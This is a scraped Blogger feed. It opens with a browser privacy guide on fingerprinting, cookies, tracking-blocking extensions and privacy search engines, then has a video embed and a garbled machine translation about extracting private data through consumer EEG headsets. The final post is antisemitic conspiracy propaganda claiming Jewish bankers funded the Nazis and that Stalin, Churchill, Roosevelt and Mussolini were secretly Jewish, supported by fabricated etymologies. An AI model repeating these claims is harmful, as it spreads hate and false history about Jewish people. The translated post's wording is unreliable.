<li><a href="https://zeltser.com/what-are-exploit-kits/" target="_self" title="What Are Exploit Kits? (An exploit kit, sometimes called an exploit pack, is a toolkit that automates the exploitation of client-side vulnerabilities, targeting browsers and programs that a website can invoke through the browser.)">What Are Exploit Kits?</a></li>
</ul>
<h3>
Fingerprinting</h3>
<em>If we ask whether a fact about a person identifies that person, it turns out that the answer isn’t simply yes or no. If all I know about a person is their ZIP code, I don’t know who they are. If all I know is their date of birth, I don’t know who they are. If all I know is their gender, I don’t know who they are. But it turns out that if I know these three things about a person, I could probably deduce their identity! Each of the facts is partially identifying.</em>There is a mathematical quantity which allows us to measure how close a fact comes to revealing somebody’s identity uniquely. That quantity is called entropy, and it’s often measured in bits. Intuitively you can think of entropy being generalization of the number of different possibilities there are for a random variable: if there are two possibilities, there is 1 bit of entropy; if there are four possibilities, there are 2 bits of entropy, etc. Adding one more bit of entropy doubles the number of possibilities. ~ <a href="https://www.eff.org/deeplinks/2010/01/primer-information-theory-and-privacy" target="_blank">A Primer on Information Theory and Privacy</a> One of the hallmarks of cutting-edge cybersurveillance is that it can be conducted remotely and automatically, virtually and near invisibly, constantly and near costlessly. In recent years, <a href="https://lilithlela.cyberguerrilla.org/?page_id=94209#digital-fingerprints" target="_blank">digital fingerprinting</a> has been used to describe a method of identity tracking combining details (<em>IP address, login identity used on multiple sites, operating system installed, web browser and version of it used</em>) to add to a fingerprint.<br />
A device fingerprint or machine fingerprint or browser fingerprint is information collected about a remote computing device for the purpose of identification. Fingerprints can be used to fully or partially identify individual users or devices even when cookies are turned off. Most browser fingerprinting techniques require Javascript to gather enough information to uniquely identify a user.<br />
<h3>
Cookies</h3>
<em>Cookies are not software. They can’t be programmed, can’t carry viruses, and can’t unleash malware to go wilding through your hard drive.</em> But tracking cookies and especially third-party tracking cookies are commonly used as ways to compile long-term records of individuals’ browsing histories.<br />
<ul>
<li><a href="http://adage.com/article/news/advertisers-win-debate-cookies/405/" target="_self" title="[1997] Advertisers win one in debate over "cookies" (Netscape said the next version of the Netscape Navigator browser will still accept all types of cookies, enabling ad management companies, ad networks and publishers to continue using them to deliver targeted ads and content to Net users.)">[1997] Advertisers win one in debate over “cookies”</a></li>
<li><a href="https://tools.ietf.org/html/rfc2109" target="_self" title="[1997] HTTP State Management Mechanism (This document specifies a way to create a stateful session with HTTP requests and responses. It describes two new headers, Cookie and Set-Cookie, which carry state information between participating origin servers and user agents.)">[1997] HTTP State Management Mechanism</a></li>
<li><a href="http://papers.ssrn.com/sol3/papers.cfm?abstract_id=565041" target="_self" title="[2004] Recipes for Cookies: How Institutions Shape Communication Technologies (Cookies technology has been shaped in differing ways by universities, firms, and consortia. A comparative institutional analysis finds that each of these institutions acted according to their own norms and processes in influencing the recipe for cookies.)">[2004] Recipes for Cookies: How Institutions Shape Communication Technologies</a></li>
<li><a href="http://paranoia.dubfire.net/2010/12/thoughts-on-mozilla-and-privacy.html" target="_self" title="[2010] Thoughts on Mozilla and Privacy (Mozilla has followed Microsoft's lead, and committed to embracing some form of a do not track mechanism in the Firefox browser as soon as early 2011. )">[2010] Thoughts on Mozilla and Privacy</a></li>
<li><a href="http://samy.pl/evercookie/" target="_self" title="Evercookie (Its goal is to identify a client even after they've removed standard cookies, Flash cookies (Local Shared Objects or LSOs), and others. (DISABLE JAVASCRIPT))">Evercookie</a></li>
<li><a href="http://webcookies.info/faq/#Directive" target="_self" title="What about the "EU Cookie Directive"? (As you can see, the Directive does not prohibit use of cookies — it only requires that end-users are fully informed about their purpose and give their consent. With the latter being quite a challenge if you actually try to implement it in real websites.)">What about the “EU Cookie Directive”?</a></li>
</ul>
<h3>
Search leakage</h3>
In most search engines, when you do a search and then click on a link, your search terms are sent to the site you clicked on (via the HTTP referrer header). This is called “search leakage.”<br />
Not only the site you intend to visit, but also the search engine gets data from your machine. For example, that Google tracks user searches and online behavior is no secret and Google often shares this information with governments that request it. Google usually follows the law, and does not comply with requests which do not meet the law. See the <a href="http://www.google.com/transparencyreport/" target="_blank">Google Transparency Report</a> for more on that. Its CEO Eric Schmidt has made plenty of <a href="https://en.wikipedia.org/wiki/Eric_Schmidt#Public_positions" target="_blank" title="https://en.wikipedia.org/wiki/Eric_Schmidt#Public_positions">controversial statements</a> in the past.<br />
<h2>
Computer forensics</h2>
<ul>
<li><a href="http://www.forensicswiki.org/wiki/SSL_forensics" target="_self" title="Forensics Wiki: SSL Forensics">Forensics Wiki: SSL Forensics</a></li>
</ul>
<h2>
Countermoves</h2>
<h2 id="countermoves">
</h2>
<a href="https://lilithlela.cyberguerrilla.org/wp-content/uploads/Obvious-Web-browser-observation_o_112179.jpg" target="_blank"><img alt="Obvious-Web-browser-observation_o_112179" class="alignright wp-image-95795" height="657" src="https://lilithlela.cyberguerrilla.org/wp-content/uploads/Obvious-Web-browser-observation_o_112179.jpg" width="320" /></a><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<h3>
Choose your browser carefully</h3>
Always use a <a href="https://www.gnu.org/licenses/license-list.html" target="_blank" title="https://www.gnu.org/licenses/license-list.html">GNU free software</a> browser. This ensures it can be freely audited. Doesn’t mean it <strong>is</strong> audited or reviewed. Check for that. Google <a href="http://www.linuxinsider.com/story/79510.html" target="_blank">Chrome is not open-source, but Chromium is</a>.<br />
<ul>
<li><a href="http://dev.chromium.org/Home" target="_self" title="Chromium (BSD)">Chromium</a></li>
<li><a href="http://midori-browser.org/" target="_self" title="Midori (GNU LESSER GENERAL PUBLIC LICENSE Version 2.1, February 1999)">Midori</a></li>
<li><a href="https://www.mozilla.org/" target="_self" title="Mozilla Firefox (Mozilla Public License (MPL) version 2.0)">Mozilla Firefox</a></li>
<li><a href="http://www.palemoon.org/" target="_self" title="Pale Moon (Even though the source is supplied under the Mozilla Public License, redistribution of the Pale Moon binaries is limited by certain conditions under a proprietary license by Moonchild Productions, as permitted under 3.2b of the MPL v2.0)">Pale Moon</a></li>
<li><a href="http://www.qupzilla.com/" target="_self" title="QupZilla (GPLv3)">QupZilla</a></li>
<li><a href="https://wiki.gnome.org/Apps/Web" target="_self" title="Web (former Epiphany) (GPL)">Web (former Epiphany)</a></li>
</ul>
<h3>
Configuring browsers</h3>
When you visit any site on the interwebz, your computer automatically sends information about it to that site (including your User agent and IP address). Built into Firefox are a number of “under the hood” settings, which can be changed to improve your privacy and anonymity when browsing.<br />
For not accepting third party cookies:<br />
<ul>
<li><a href="https://support.mozilla.org/en-US/kb/disable-third-party-cookies" target="_blank">Firefox</a>: Preferences > Privacy > Accept third-party cookies > Never.</li>
<li><a href="https://support.google.com/chrome/answer/95647" target="_blank">Chrome</a> (also chromium): Settings > Show advanced settings… > Content settings > Block third-party cookies and site data.</li>
</ul>
When you change the default cookie “lifetime” from “Keep until: they expire” to “Keep until: I close Firefox”, Firefox changes any persistent cookies that sites set to session cookies. To allow a site to set a persistent cookie, you need to make an exception (site permission). For clearing cookies on exit:<br />
<ul>
<li>Firefox/Tools > Options > Privacy > “Use custom settings for history” > Cookies: Keep until: “I close Firefox”.</li>
<li>Chrome (also chromium): Settings > Show advanced settings… > Content settings > Keep local data only until you quit your browser.</li>
</ul>
When you turn on the clearing of history at shutdown and include cookies, that runs a completely separate process which does not pay any attention to cookie lifetime or exceptions (site permissions). It just nukes them all. (Note that some cookies might survive clearing at shutdown if they are encoded into your session history file, the one Firefox uses to restore your previous session windows and tabs.)<br />
For disabling flash:<br />
<ul>
<li>Firefox: Add-ons > Plugins > Flash > Never Activate.</li>
<li>Chrome (also chromium): Settings > Show advanced settings… > Content settings > Do not run plugins by default.</li>
</ul>
For disabling java:<br />
<ul>
<li>Firefox: Add-ons > Plugins > Java > Never Activate.</li>
<li>Chrome (also chromium): Settings > Show advanced settings… > Content settings > Do not run plugins by default.</li>
</ul>
<h3>
</h3>
<em>You can also install a <a href="https://www.torproject.org/projects/torbrowser.html.en" target="_blank" title="https://www.torproject.org/projects/torbrowser.html.en">Tor Browser bundle</a> (based on firefox) as an “anonymising” browser. Tor tunnels application data through TLS connections and it is not possible to decrypt such connections by performing traditional man-in-the-middle attack. Tor also sends application data in chunks to make it harder to guess exactly how many bytes users are communicating. For more on such cloaking see the <a href="https://lilithlela.cyberguerrilla.org/?page_id=94527" target="_blank">mage arena guide</a>.</em> And further under the hood:<br />
<ul>
<li><a href="http://kb.mozillazine.org/About:config" target="_self" title="About:config (about:config is a feature of Mozilla applications which lists application settings (known as preferences) that are read from the profile files prefs.js and user.js, and from application defaults.)">About:config</a></li>
<li><a href="https://www.bestvpn.com/blog/8499/make-firefox-secure-using-aboutconfig/" target="_self" title="How to make Firefox more secure using about:config">How to make Firefox more secure using about:config</a></li>
</ul>
<h3>
Securing browsers with extensions</h3>
The <em>NoScript</em> Firefox extension provides extra protection for Firefox, Seamonkey and other mozilla-based browsers: this add-on allows JavaScript, Java, Flash and other plugins to be executed <strong>only</strong> by trusted web sites of your choice (e.g. your online bank). There is mozilla talk of “adding NoScript functionality into the core browser”.<br />
The closest Extension to <em>NoScript</em> that I have found for Chromium is <em>ScriptSafe</em>, which has certain operational differences: Apparently ScriptSafe acts more stringently concerning components of Web pages compared to NoScript.<br />
A disctinct feature of <em>HTTP Switchboard</em> is that it is a scriptblocker and <strong>also</strong> an adblocker. It is no longer developed. The project has been split into two distinct, more advanced extensions: uBlock Origin and uMatrix.<br />
<ul>
<li><a href="https://github.com/gorhill/httpswitchboard/wiki/How-to-use-HTTP-Switchboard:-Two-opposing-views" target="_self" title="How to use HTTP Switchboard: Two opposing views">How to use HTTP Switchboard: Two opposing views</a></li>
<li><a href="http://noscript.net/" target="_self" title="NoScript (firefox) (The NoScript Firefox extension provides extra protection for Firefox, Seamonkey and other mozilla-based browsers: this free, open source add-on allows JavaScript, Java, Flash and other plugins to be executed only by trusted web sites of your choice.)">NoScript (firefox)</a></li>
<li><a href="https://addons.mozilla.org/en-us/firefox/addon/policeman/" target="_self" title="policeman (firefox) (Policeman gives you precise control over what web requests are allowed. Create rules based on domain name and type of resource being requested. It can also be used to improve privacy or block cross-site scripts.)">policeman (firefox)</a></li>
<li><a href="https://addons.mozilla.org/en-US/firefox/addon/requestpolicy/" target="_self" title="Request Policy (firefox) (Cross-site Requests may expose you to tracking)">Request Policy (firefox)</a></li>
<li><a href="https://chrome.google.com/webstore/detail/scriptsafe/oiigbmnaadbkfbmpbfijlflahbdbdgdf" target="_self" title="ScriptSafe (chromium) (A simple extension that brings some of NoScript's functionality to Chrome while emphasizing simplicity and intuitiveness (no affiliation to NoScript))">ScriptSafe (chromium)</a></li>
<li><a href="https://chrome.google.com/webstore/detail/ublock-origin/cjpalhdlnbpafiamejdnhcphjbkeiagm" target="_self" title="ublock origin (chromium) (An efficient blocker: easy on memory and CPU footprint, and yet can load and enforce thousands more filters than other popular blockers out there.)">ublock origin (chromium)</a></li>
<li><a href="https://chrome.google.com/webstore/detail/umatrix/ogfcmafjalglgifnmanfmnieipoejdcf" target="_self" title="umatrix (chromium) (Descendant of http switchboard)">umatrix (chromium)</a></li>
</ul>
<h3>
Fixing tracking with extensions</h3>
After installation of browser, you can fix tracking – be careful, some extensions or plugins are not what they seem, nor are all nixes, for instance <a href="https://fixubuntu.com/" target="_blank">if you are on Ubuntu, fix it</a>. Blockers listed here do not prevent the execution of inline javascript. For that see <a href="https://lilithlela.cyberguerrilla.org/?page_id=88187#secure-browser" target="_blank" title="https://lilithlela.cyberguerrilla.org/?page_id=88187#secure-browser">securing browsers with extensions.</a><br />
<ul>
<li><a href="http://lifehacker.com/ad-blocking-extension-ghostery-actually-sells-data-to-a-514417864" target="_self" title="Ad-Blocker Ghostery Actually Helps Advertisers, If You "Support" It">Ad-Blocker Ghostery Actually Helps Advertisers, If You “Support” It</a></li>
<li><a href="https://github.com/gorhill/httpswitchboard/wiki/How-does-HTTP-Switchboard-compares-to-AdBlock-,-Ghostery-or-Disconnect-concerning-privacy%3F" target="_self" title="How does HTTP Switchboard compares to AdBlock , Ghostery or Disconnect concerning privacy? (testing)">How does HTTP Switchboard compares to AdBlock , Ghostery or Disconnect concerning privacy?</a></li>
<li><a href="https://www.eff.org/https-everywhere" target="_self" title="https everywhere ( Switches to secure TLS connections whenever the website supports it. This helps to protect against surveillance of the content of your web browsing, although it does not hide which websites you are visiting (unless you also run Tor or a VPN). )">https everywhere</a></li>
<li><a href="https://www.ublock.org/" target="_self" title="ublock (chromium) (Content. Not clutter. uBlock prevents most advertisements and tracking networks. It is similar to Adblock Plus or Disconnect but works better and is much faster. )">ublock (chromium)</a></li>
<li><a href="http://www.areweprivateyet.com/" target="_self" title="Which Extension Protects Better?">Which Extension Protects Better?</a></li>
<li><a href="http://www.wilderssecurity.com/threads/ublock-a-lean-and-fast-blocker.365273/" target="_self" title="µBlock, a lean and fast blocker (ublock, like ublock origin but made simple)">µBlock, a lean and fast blocker</a></li>
</ul>
Clean all teh things:<br />
<ul>
<li><a href="https://addons.mozilla.org/en-US/firefox/addon/self-destructing-cookies/" target="_self" title="Self-Destructing Cookies (firefox) ( Gets rid of a site's cookies and LocalStorage as soon as you close its tabs. Protects against trackers and zombie-cookies. Trustworthy services can be whitelisted.)">Self-Destructing Cookies (firefox)</a></li>
</ul>
And play with some really fun add-on stuff:<br />
<em>Depending on your context, purpose, threat model, do not make yourself stand out like a “Big Red A-Team Tank Vehicle” on the internet highway. Really, <a href="https://lilithlela.cyberguerrilla.org/?p=5218" target="_blank" title="Browsers talk too much">browsers talk too much.</a></em><br />
<ul>
<li><a href="http://www.ericgiguere.com/articles/masquerading-your-browser.html" target="_self" title="Masquerading Your Browser">Masquerading Your Browser</a></li>
<li><a href="https://dephormation.org.uk/index.php?page=81" target="_self" title="Secret Agent (HTTP Header information can be identifying )">Secret Agent</a></li>
<li><a href="https://addons.mozilla.org/en-US/firefox/addon/smart-referer/" target="_self" title="Smart Referer (firefox) (The HTTP referer header may leak information)">Smart Referer (firefox)</a></li>
</ul>
<h3>
Checks and balances</h3>
<ul>
<li><a href="http://browserspy.dk/" target="_self" title="BrowserSpy (How much information does your browser reveal about you and your system? )">BrowserSpy</a></li>
<li><a href="https://panopticlick.eff.org/" target="_self" title="Panopticlick (Is your browser configuration rare or unique? If so, web sites may be able to track you, even if you limit or disable cookies.)">Panopticlick</a></li>
</ul>
<h3>
Sharing contents and information with others</h3>
<ul>
<li>Be suspicious of any email with urgent requests for personal (financial) information.</li>
<li>Avoid filling out forms in email messages that ask for personal (financial) information.</li>
<li>The contents you share (videos, photos, documents) may contain metadata connected to your true identity, so be very careful, learn <a href="https://lilithlela.cyberguerrilla.org/?page_id=2761#remove-metadata" target="_blank">how to delete metadata</a> and switch off the GPS in your smartphone, mobile devices and camera before you capture images or videos.</li>
</ul>
<h3>
Hoaxes & scams</h3>
<ul>
<li><a href="http://hoax-slayer.com/" target="_self" title="Hoax Slayer (Hoax-Slayer: Debunks email and social media hoaxes, thwarts Internet scammers, combats spam, educates web users about email, social media, and Internet security issues)">Hoax Slayer</a></li>
<li><a href="http://www.hoaxbuster.com/" target="_self" title="Hoaxbuster (fr)">Hoaxbuster (fr)</a></li>
<li><a href="http://hoaxbusters.org/hoax10.html" target="_self" title="Top Five Signs That an E-mail is a Hoax (The next time that you receive an alarming e-mail calling you to action, look for one or more of these five telltale characteristics before even thinking about sending it along to anybody else.)">Top Five Signs That an E-mail is a Hoax</a></li>
</ul>
<h3>
Search</h3>
Startpage can also be combined with the Ixquick proxy. On the Startpage search results page, a ‘View by Ixquick Proxy’ option can be used to visit the search result with a proxy. Startpage has SSL and HTTPS add-ons for Mozilla Firefox.<br />
<ul>
<li><a href="https://duckduckgo.com/" target="_self" title="Duck Duck Go (anonymous search) (DuckDuckGo has integration into several other search engines with the !bang syntax. Examples includes StartPage and StartPage Images, which you can search by prefixing your query with !s or !spi respectively. )">Duck Duck Go (anonymous search)</a></li>
<li><a href="https://ixquick.com/" target="_self" title="IxQuick (A meta search engine with focus on privacy. Not as good as DuckDuckGo, but its servers are hosted in the Netherlands, hence are less affected by US patriot act, letters and gag orders.)">IxQuick</a></li>
<li><a href="https://startpage.com/" target="_self" title="StartPage (Startpage takes your search query, and returns anonymized Google search results. This way, you get Google search results, but Google doesn’t get to know who you are. )">StartPage</a></li>
<li><a href="http://yacy.net/en/index.html" target="_blank" title="YaCy (distributed search)">YaCy (distributed search)</a></li>
</ul>
<h2>
Anti forensics</h2>
<ul>
<li><a href="http://www.irongeek.com/i.php?page=videos/anti-forensics-occult-computing" target="_self" title="Anti-Forensics: Occult Computing Class ( Little over 3hr of video on the subject of anti-forensic techniques)">Anti-Forensics: Occult Computing Class</a></li>
<li><a href="http://www.forensicswiki.org/wiki/Anti-forensic_techniques" target="_self" title="Forensics Wiki: Anti-forensic techniques (This can include refusing to run when debugging mode is enabled, refusing to run when running inside of a virtual machine, or deliberately overwriting data. Although some anti-forensic tools have legitimate purposes, such as overwriting sensitive data ...)">Forensics Wiki: Anti-forensic techniques</a></li>
</ul>
<div>
via <a href="http://anonymissexpress.tumblr.com/">http://anonymissexpress.tumblr.com/</a></div>
</div>
</div>
<div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-2615012028595202594.post-27744021643393278712012-12-09T03:51:00.001+01:002012-12-09T03:51:15.600+01:00The Alternative Media Disinfo: Game Over<iframe allowfullscreen="" frameborder="0" height="270" src="http://www.youtube.com/embed/Wg3cbnFwgVo?fs=1" width="480"></iframe><div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2615012028595202594.post-30705414347988310342012-12-02T03:22:00.000+01:002012-12-02T03:22:55.785+01:00Interception of information by the human brain: The next step of electronic monitoring we prepare<h2 class="date-header">
<span><span>Saturday, December 1, 2012</span></span> </h2>
<div class="date-posts">
<div class="post-outer">
<div class="post hentry" itemscope="itemscope" itemtype="http://schema.org/BlogPosting">
<a href="http://www.blogger.com/blogger.g?blogID=2615012028595202594" name="9005858617845149689"></a><h3 class="post-title entry-title" itemprop="name">
<span> Interception of information by the human brain: The next step of electronic monitoring we prepare</span> </h3>
<div class="post-body entry-content" id="post-body-9005858617845149689" itemprop="description articleBody">
<div dir="ltr" style="text-align: left;">
<div class="post-header">
<div class="post-share">
<span class="post-share-fb mysprite"></span><span class="post-share-tw mysprite"></span><span class="post-share-gg mysprite"></span></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<img alt="" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX3jz-Cs_YWpVDhpRCVvZ_pswareU6kkKwp4i_czlSyQwfkmWkKPxnhBa_NSxkW7WX-soQtVRXZJ1IOYvWKptVlQ8XiDlBVI-OBOQpNQaQGClHpOvYqX6lMCffrDGwy-iHJSDE_3MMHjbh/s560/ilektroniki-parakoloythisi.jpg" title="Interception of information by the human brain: The next step of electronic monitoring we prepare" width="560" /></div>
<span>
Of course, our peddling now that is only beginning as an "innocent
game" or an "interesting experiment" ... but imagine what will happen
when someone would want to steal that <strong>data</strong> from our minds (!) With WITHOUT our will:</span> </div>
<div dir="ltr" style="text-align: left;">
<br /><a href="http://www.blogger.com/blogger.g?blogID=7123050054995479129" name="more"></a> <span> <a href="http://translate.googleusercontent.com/translate_c?depth=1&ie=UTF8&prev=_t&rurl=translate.google.com&tl=en&twu=1&u=http://agiotokos-kappadokia.gr/2012/11/30/%25CF%2584%25CE%25BF-hacking-%25CF%2583%25CF%2584%25CE%25BF%25CE%25BD-%25CE%25B1%25CE%25BD%25CE%25B8%25CF%2581%25CF%258E%25CF%2580%25CE%25B9%25CE%25BD%25CE%25BF-%25CE%25B5%25CE%25B3%25CE%25BA%25CE%25AD%25CF%2586%25CE%25B1%25CE%25BB%25CE%25BF-%25CE%25AD%25CE%25B3%25CE%25B9%25CE%25BD%25CE%25B5-%25CF%2580%25CF%2581%25CE%25B1/&usg=ALkJrhgz3LSuAxjmpuiITv8tTelL45LMSA" target="_blank">Hacking the human brain was in reality</a></span> </div>
<div dir="ltr" style="text-align: left;">
<br /> <span> "Using an inexpensive electroencephalogram (EEG) from the BCI device managed to have successful attacks.</span> <span>
So successful they were able to uncover private information from the
life of volunteers as numbers, bank card numbers, PIN, addresses of
their homes, people who know and like. "</span> <br /> <span> And then we suck candy for "security."</span> <span> Here with those who have trouble not be "safe" or the thoughts in our heads and it will be <em>chips</em> and <strong>electronic identities?</strong></span> </div>
<div dir="ltr" style="text-align: left;">
<br /> <span> <b>We never imagined that hackers can get data from a <strong>human brain?</strong></b></span> </div>
<div dir="ltr" style="text-align: left;">
<br /> <span> If you do not think your looks or science fiction read below.</span> <br /> <span>
The above conclusion led researchers presented their study at the
Usenix Conference on Security 2012, held from 8 to 12 August in
Washington.</span> </div>
<div dir="ltr" style="text-align: left;">
<br /> <span> Using a simple device that is marketed by the Neyrosky with costs ranging from 200 to $ 300 able to have access to the brain.</span> <span>
These devices are used for a variety of applications such as video
games, hands-free keyboards, or utilities for relaxation training.</span> </div>
<div dir="ltr" style="text-align: left;">
<br /> <span> For the study included 28 volunteers wore appliances Brain computer interfaces (BCI) from Neyrosky.</span> <span> The researchers were able to access an API to collect data from the devices BCI.</span> </div>
<div dir="ltr" style="text-align: left;">
<br /><div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<img alt="" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQUUDaPIL9doPCTqreYIMNiNR2z9GhvH3rTYQp_R4kB7iC8OTNR0JDd4Lscr61Ea0uonHtp4m-Yr03FdiFWq-KmT2ZdBEInP-hDqwBI8MHJ5prg_sMqaXvyAtnw1UjhkjPuC1w_5RAg4w8/s560/ilektroniki-parakoloythisi-1.jpg" title="Interception of information by the human brain: The next step of electronic monitoring we prepare" width="560" /></div>
<span> The results were surprising (if not scary).</span> <span>
The researchers were able to obtain and disclose private and
confidential information of the volunteers wore BCI translating through
the API electromagnetic signals sent to the brain.</span> </div>
<div dir="ltr" style="text-align: left;">
<br /> <span> Using an inexpensive electroencephalogram (EEG) from the BCI device managed to have successful attacks.</span> <span> So successful they were able to uncover <strong>private information</strong> from the life of volunteers as numbers, bank card numbers, PIN, addresses of their homes, people who know and like.</span> <br /> <span> This is the first attempt to study the implications for consumer safety devices BCI.</span> <br /> <span> The results are shocking but it is something that should be expected with the speed of new technology.</span></div>
<div dir="ltr" style="text-align: left;">
<span> </span> </div>
</div>
<div class="post-footer">
<div class="post-footer-line post-footer-line-1">
<span> <span class="post-author vcard">Posted by <a href="http://translate.googleusercontent.com/translate_c?depth=1&ie=UTF8&prev=_t&rurl=translate.google.com&tl=en&twu=1&u=http://www.blogger.com/profile/04840206255629549391&usg=ALkJrhiEWbzBH70vjyxVmEioUW5C1zHthg" itemprop="author" rel="author" title="author profile"><span class="fn">ICEUJIN</span></a></span> <span class="post-timestamp">at <a href="http://iceujininfos.blogspot.com/2012/12/blog-post.html">Original in Greek</a>.. </span></span><span><a href="http://translate.googleusercontent.com/translate_c?depth=1&ie=UTF8&prev=_t&rurl=translate.google.com&tl=en&twu=1&u=http://iceujininfos.blogspot.co.uk/&usg=ALkJrhi4-rT3pOOJOaaCYbo3_7KRfXnEmw">http://iceujininfos.blogspot.com</a></span> <div class="descriptionwrapper">
<h4 class="description">
<span> <a href="http://ellinwnegersi.blogspot.com/"><span>http://ellinwnegersi.blogspot.com</span></a></span></h4>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2615012028595202594.post-30906234125511727932012-12-01T17:28:00.000+01:002012-12-01T17:28:59.818+01:00Sepharadim=Separrati="Elite" hebrewmongol descendant of Havra-Khan or Abraham. Pawns of the Dragon. #Awaken #Arise #RA<h3 class="post-title entry-title" itemprop="name">
<br />
</h3>
<div class="post-header">
</div>
<div dir="ltr" style="text-align: left;">
<b><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;">Sepharadim Hitler-Hisler-Rothchild</span></b><br />
<br style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;" />
<b><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;">hebrew Sepharadim Himler uber fuhrer</span></b><br />
<br style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;" />
<span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;"><b>Nazis funded by hebrewmongols bankers: Warburg, Rothchilds, Levi and Levi, Baum , etc..</b></span><br />
<br style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;" />
<b><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;">Sepharadim=Separrati="Elite" hebrewmongol descendant of Havra-Khan or Abraham</span></b><br />
<br style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;" />
<b><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;">*:
The Rothchilds are falsely and deviously categorized by the Rabbis in
the Askenazim (Askanians) White Pelasgians race expendables B' category
of pseudo-hebrews, while the Rothchilds are in reality hebrewmongols
Khazars A' Category Sepharadim mongols agents of the Chinese.</span><br style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;" /><br style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;" /><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;">Also
the hebrewmongol motivated Nazis had as an occupation forces
primeminister in Greece in 1944 the greekhebrew Ioannis Rallis or Raul
clan (French-hebrew origins clan)</span></b>
<br />
<br style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;" />
<span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;">[</span><a href="http://www.godlikeproductions.com/external?http%3A%2F%2Fen.wikipedia.org%2Fwiki%2FIoannis_Rallis" rel="nofollow" style="color: blue; font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;" target="_blank">link to en.wikipedia.org</a><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;">] </span><br />
<br style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;" />
<b><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;">also Benito Mussolini in hebrew-Italian means Ben-ito(Ben = Son) Musso = Moses (= Son of Moses)</span><br style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;" /><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;">see: The Algebra of Mohammed ben Musa (1831) (Ben Musa=Son of Moses)</span></b>
<b><br style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;" /><br style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;" /><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;">Stalin of Russia was also hebrew from Georgia.</span></b>
<b><br style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;" /><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;">Jew-gas-villy = The son of the jew.</span></b>
<b><br style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;" /><br style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;" /><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;">Churchil of England = hebrewsaxon Churtzl.</span></b>
<b><br style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;" /><br style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;" /><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;">And Roosewelt of USA = Rosen-welt = hebrew</span></b>
<b><br style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;" /><br style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;" /><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;">and mongol Hirohito of Japan..</span></b>
<b><br style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;" /><br style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;" /><u><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;">The Absolute Hebrew-mongol Theater-Collusion of WORLD WAR 2</span></u></b><u>
</u><b><br style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;" /><br style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;" /><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;">HEBREWCHINESE MOTIVATED: "WORLD WAR 3" OR "ARMAGEDDON" SOON AT A THEATER NEAR YOU</span></b><br />
<br />
<b><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;"><img height="200" id="il_fi" src="http://t3.gstatic.com/images?q=tbn:ANd9GcTI39a9DZTMvt-LvvtfGIOrrn8JNpQSMUoiQvCvI9P94kO11zVtfk4dIUIZkQ" style="padding-bottom: 8px; padding-right: 30px; padding-top: 8px;" width="200" /> </span></b><br />
<h3 class="post-title entry-title" itemprop="name">
